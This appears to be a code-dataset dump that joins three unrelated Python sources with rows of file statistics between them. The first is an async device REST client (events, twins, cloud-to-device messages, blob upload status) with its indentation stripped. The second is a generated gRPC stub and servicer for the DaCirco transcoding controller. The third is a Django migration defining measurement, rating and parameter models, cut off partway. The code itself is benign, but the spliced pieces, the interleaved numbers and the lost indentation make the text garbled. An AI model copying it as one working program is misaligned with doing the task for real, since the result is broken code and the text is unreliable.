:type connection_id: str
:param event_body:
:type event_body: ~e2erestapi.models.EventBody
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.send_event.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(event_body, 'EventBody')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
send_event.metadata = {'url': '/device/{connectionId}/event'}
async def wait_for_c2d_message(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Wait for a c2d message.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EventBody or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.EventBody or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_c2d_message.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EventBody', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_c2d_message.metadata = {'url': '/device/{connectionId}/c2dMessage'}
async def enable_twin(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable device twins.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_twin.metadata = {'url': '/device/{connectionId}/enableTwin'}
async def get_twin(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Get the device twin.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Twin or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.Twin or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Twin', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_twin.metadata = {'url': '/device/{connectionId}/twin'}
async def patch_twin(
self, connection_id, twin, *, custom_headers=None, raw=False, **operation_config):
"""Updates the device twin.
:param connection_id: Id for the connection
:type connection_id: str
:param twin:
:type twin: ~e2erestapi.models.Twin
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.patch_twin.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(twin, 'Twin')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
patch_twin.metadata = {'url': '/device/{connectionId}/twin'}
async def wait_for_desired_properties_patch(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Wait for the next desired property patch.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Twin or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.Twin or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_desired_properties_patch.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Twin', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_desired_properties_patch.metadata = {'url': '/device/{connectionId}/twinDesiredPropPatch'}
async def get_connection_status(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""get the current connection status.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: str or ClientRawResponse if raw=true
:rtype: str or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_connection_status.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_connection_status.metadata = {'url': '/device/{connectionId}/connectionStatus'}
async def wait_for_connection_status_change(
self, connection_id, connection_status, *, custom_headers=None, raw=False, **operation_config):
"""wait for the current connection status to change and return the changed
status.
:param connection_id: Id for the connection
:type connection_id: str
:param connection_status: Desired connection status. Possible values
include: 'connected', 'disconnected'
:type connection_status: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: str or ClientRawResponse if raw=true
:rtype: str or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_connection_status_change.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionStatus'] = self._serialize.query("connection_status", connection_status, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
wait_for_connection_status_change.metadata = {'url': '/device/{connectionId}/connectionStatusChange'}
async def get_storage_info_for_blob(
self, connection_id, blob_name, *, custom_headers=None, raw=False, **operation_config):
"""Get storage info for uploading into blob storage.
:param connection_id: Id for the connection
:type connection_id: str
:param blob_name: name of blob for blob upload
:type blob_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BlobStorageInfo or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.BlobStorageInfo or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_storage_info_for_blob.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['blobName'] = self._serialize.query("blob_name", blob_name, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('BlobStorageInfo', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_storage_info_for_blob.metadata = {'url': '/device/{connectionId}/storageInfoForBlob'}
async def notify_blob_upload_status(
self, connection_id, correlation_id, is_success, status_code, status_description, *, custom_headers=None, raw=False, **operation_config):
"""notify iothub about blob upload status.
:param connection_id: Id for the connection
:type connection_id: str
:param correlation_id: correlation id for blob upload
:type correlation_id: str
:param is_success: True if blob upload was successful
:type is_success: bool
:param status_code: status code for blob upload
:type status_code: str
:param status_description: human readable descripton of the status for
blob upload
:type status_description: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.notify_blob_upload_status.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['correlationId'] = self._serialize.query("correlation_id", correlation_id, 'str')
query_parameters['isSuccess'] = self._serialize.query("is_success", is_success, 'bool')
query_parameters['statusCode'] = self._serialize.query("status_code", status_code, 'str')
query_parameters['statusDescription'] = self._serialize.query("status_description", status_description, 'str')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
notify_blob_upload_status.metadata = {'url': '/device/{connectionId}/blobUploadStatus'}
| 41.891681 | 149 | 0.666777 | 5,037 | 48,343 | 6.196546 | 0.052214 | 0.034602 | 0.028194 | 0.031014 | 0.854479 | 0.843329 | 0.837306 | 0.82715 | 0.81584 | 0.81584 | 0 | 0.006235 | 0.246861 | 48,343 | 1,153 | 150 | 41.928014 | 0.851026 | 0.051962 | 0 | 0.74902 | 1 | 0 | 0.090058 | 0.029616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001961 | false | 0.005882 | 0.005882 | 0 | 0.07451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6f69d77b76a5edd33e6caaa64fb8f65519eff84c | 14,677 | py | Python | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | src/dacirco/proto/dacirco_pb2_grpc.py | albertoblanc/dacirco | 965a2e4ad49ec7754eb42442a570bf6d1bf00e89 | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from dacirco.proto import dacirco_pb2 as dacirco_dot_proto_dot_dacirco__pb2
class DaCircogRPCServiceStub(object):
"""*
The gRPC interface of the DaCirco controller
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.submit_request = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_request',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.FromString,
)
self.get_requests = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_requests',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.Empty.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.FromString,
)
self.get_request = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_request',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
)
self.get_request_status = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/get_request_status',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.FromString,
)
self.register_worker = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/register_worker',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
self.get_tasks = channel.unary_stream(
'/dacirco_grpc_service.DaCircogRPCService/get_tasks',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCTask.FromString,
)
self.submit_event = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_event',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
self.submit_error = channel.unary_unary(
'/dacirco_grpc_service.DaCircogRPCService/submit_error',
request_serializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.SerializeToString,
response_deserializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
)
class DaCircogRPCServiceServicer(object):
"""*
The gRPC interface of the DaCirco controller
"""
def submit_request(self, request, context):
"""/ The REST frontend calls this method when it recevies a new request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_requests(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_request(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs/job_id request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_request_status(self, request, context):
"""/ The REST frontend calls this method to answer a GET /jobs/job_id/stae request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def register_worker(self, request, context):
"""/ Each transcoding worker calls this method whenever it *first* starts
(i.e., one call only from each worker).
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get_tasks(self, request, context):
"""/ Transconding workers call this method to get their tasks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def submit_event(self, request, context):
"""/ Transconding workers call this method to inform the controller about a (non-error) event.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def submit_error(self, request, context):
"""/ Transconding workers call this method to inform the controller about a (non-error) event.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DaCircogRPCServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'submit_request': grpc.unary_unary_rpc_method_handler(
servicer.submit_request,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.SerializeToString,
),
'get_requests': grpc.unary_unary_rpc_method_handler(
servicer.get_requests,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.Empty.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.SerializeToString,
),
'get_request': grpc.unary_unary_rpc_method_handler(
servicer.get_request,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
),
'get_request_status': grpc.unary_unary_rpc_method_handler(
servicer.get_request_status,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.RequestID.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.SerializeToString,
),
'register_worker': grpc.unary_unary_rpc_method_handler(
servicer.register_worker,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
'get_tasks': grpc.unary_stream_rpc_method_handler(
servicer.get_tasks,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.TCTask.SerializeToString,
),
'submit_event': grpc.unary_unary_rpc_method_handler(
servicer.submit_event,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
'submit_error': grpc.unary_unary_rpc_method_handler(
servicer.submit_error,
request_deserializer=dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.FromString,
response_serializer=dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dacirco_grpc_service.DaCircogRPCService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class DaCircogRPCService(object):
"""*
The gRPC interface of the DaCirco controller
"""
@staticmethod
def submit_request(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_request',
dacirco_dot_proto_dot_dacirco__pb2.TCRequest.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequestReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_requests(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_requests',
dacirco_dot_proto_dot_dacirco__pb2.Empty.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.RequesIDList.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_request(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_request',
dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_request_status(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_request_status',
dacirco_dot_proto_dot_dacirco__pb2.RequestID.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCRequestStatus.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def register_worker(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/register_worker',
dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get_tasks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/dacirco_grpc_service.DaCircogRPCService/get_tasks',
dacirco_dot_proto_dot_dacirco__pb2.WorkerDesc.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.TCTask.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def submit_event(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_event',
dacirco_dot_proto_dot_dacirco__pb2.GrpcEvent.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def submit_error(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dacirco_grpc_service.DaCircogRPCService/submit_error',
dacirco_dot_proto_dot_dacirco__pb2.GrpcErrorEvent.SerializeToString,
dacirco_dot_proto_dot_dacirco__pb2.gRPCServiceReply.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 46.891374 | 124 | 0.677386 | 1,445 | 14,677 | 6.483737 | 0.093426 | 0.053367 | 0.07845 | 0.09414 | 0.880991 | 0.878109 | 0.863059 | 0.837763 | 0.713523 | 0.63027 | 0 | 0.004568 | 0.254275 | 14,677 | 312 | 125 | 47.041667 | 0.851439 | 0.073925 | 0 | 0.59127 | 1 | 0 | 0.101962 | 0.066959 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.007937 | 0.031746 | 0.123016 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5b0b600e8a1e85dba1c5854a4d0a33157de33a29 | 15,297 | py | Python | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | configuration/migrations/0001_initial.py | Parveen3300/Reans | 6dfce046b01099284a8c945a04600ed83e5099a4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-15 05:11
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UnitOfMeasurement',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('unit_measurement', models.CharField(max_length=30, unique=True)),
('short_form', models.CharField(max_length=10)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_unitofmeasurements', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_unitofmeasurements', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': ' Unit Of Measurement',
'verbose_name_plural': ' Unit Of Measurement',
'db_table': 'unit_of_measurement',
},
),
migrations.CreateModel(
name='RatingParameter',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('rating_parameter', models.CharField(max_length=100, unique=True, verbose_name='Rating Parameter Name')),
('rating_parameter_value', models.IntegerField(null=True, unique=True, validators=[django.core.validators.MaxValueValidator(5), django.core.validators.MinValueValidator(1)], verbose_name='Rating Points')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_ratingparameters', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_ratingparameters', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Rating Parameters',
'verbose_name_plural': 'Rating Parameters',
'db_table': 'rating_parameter_configuration',
},
),
migrations.CreateModel(
name='ParameterSetting',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
